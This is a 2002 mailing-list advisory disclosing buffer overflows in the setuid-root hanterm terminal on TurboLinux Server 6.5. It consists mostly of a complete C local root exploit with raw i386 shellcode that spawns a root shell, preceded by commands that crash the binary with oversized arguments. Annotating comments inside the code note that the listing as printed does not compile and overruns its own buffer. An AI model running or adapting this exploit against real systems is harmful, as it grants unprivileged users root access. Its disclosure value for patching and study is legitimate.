
 
From: xperc (xperchotmail.com)
Date: Thu Feb 07 2002 - 04:33:27 CST


    Hi, I'm xperc.

      hanterm is a Hangul terminal for X, based on the
    xterm in XFree86. The hanterm binary is installed
    setuid root by default on TurboLinux Server 6.5, but
    contains insecure code that allows unprivileged local
    users to obtain root access on the local system.

    $which hanterm
    /usr/bin/X11/hanterm
    $ls -l /usr/bin/X11/hanterm
    -rws--x--x 1 root root 166100 03 13
    2001 /usr/bin/X11/hanterm*
    $rpm -qf /usr/bin/X11/hanterm
    hanterm-xf-p18-3.3-6
    $hanterm -fn `perl -e 'print "a"x100'`
    Segmentation fault
    $hanterm -hfb `perl -e 'print "a"x8000'`
    Segmentation fault
    $hanterm -hfn `perl -e 'print "a"x8000'`
    Segmentation fault
    ...etc

    /* hanterm_exp.c
     *
     * local exploit for hanterm
     * .. tested in TurboLinux Server 6.5 (Japan)
     *
     * thanks my Japanese friend kaju(kaijyu)
     * and Japanese hacker UNYUN.
     *
     * by xperchotmail.com
     * 2002/02/07
     */

    #include <stdio.h>

    #define NOP 0x90
    #define MAXBUF 88
    #define RETOFS 84
    #define SHELL_OFS 22
    #define ESP_OFS -0xe38

    /* Return the caller's stack pointer.
     *
     * Relies on i386 inline assembly leaving the value in EAX, the
     * integer return register, and on the function having no return
     * statement: falling off the end of a non-void function whose
     * value is used is undefined behaviour in C, so an optimising or
     * non-x86 build may not hand back ESP at all. */
    unsigned int get_esp()
    {
            __asm__("mov %esp,%eax");
    }

    /* Advisory proof-of-concept: builds an oversized "-fn" argument in
     * buf and execs the hanterm binary with it.
     *
     * Risk context: the transcript above shows the binary installed
     * setuid root, so any flaw in its argument handling is a local
     * privilege escalation; the mitigation is to remove the setuid bit
     * or update the package.  As printed in the mail this listing does
     * not compile (see the notes on the execl() call below), and
     * memset/strncpy/strlen/execl are used with only <stdio.h>
     * included, i.e. via implicit declarations that C99 no longer
     * permits. */
    int main()
    {
            /* Author-supplied raw i386 byte payload, copied into buf
             * below; not decoded here. */
            static char shellcode[]={
                0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
                
    0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
                0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
                
    0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
                0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
                0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
                0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
            };
            unsigned int retadr;
            char buf[MAXBUF];   /* MAXBUF is 88 bytes (see #define above) */
            int i;
            
            /* Fill the whole argument with NOP (0x90) bytes. */
            memset(buf,NOP,MAXBUF);

            /* Guessed address: this process's stack pointer plus the
             * fixed ESP_OFS; only meaningful for the author's test
             * environment (TurboLinux Server 6.5 per the header). */
            retadr=get_esp()+ESP_OFS;
            /* %p expects a pointer but receives an unsigned int:
             * format/argument mismatch, undefined behaviour in C. */
            printf("Jumping address = %p\n",retadr);

            /* Writes retadr little-endian at every 4-byte slot from
             * RETOFS-32 (52) up to RETOFS+28 (112).  NOTE(review):
             * i+3 reaches 115 while buf holds only MAXBUF (88) bytes,
             * so the PoC overruns its own stack array here — undefined
             * behaviour in this program. */
            for(i=RETOFS-32;i<RETOFS+32;i+=4){
                    buf[i] =retadr&0xff;
                    buf[i+1]=(retadr>>8)&0xff;
                    buf[i+2]=(retadr>>16)&0xff;
                    buf[i+3]=(retadr>>24)&0xff;
            }
            /* Copies strlen(shellcode) bytes, i.e. without the
             * terminating NUL, at offset SHELL_OFS (22) of buf. */
            strncpy(buf+SHELL_OFS,shellcode,strlen
    (shellcode));
            //buf[MAXBUF-1]='\0'; faint!:-(
            /* buf is passed as the value of the -fn option.  The "-fn"
             * literal is split across two lines by the mail wrapping,
             * which is a syntax error as shown.  execl() only returns
             * on failure and that return is not checked; main itself
             * has no return statement (implicit 0 under C99). */
            execl("/usr/bin/X11/hanterm","hanterm","-
    fn",buf,(char *)0);
    }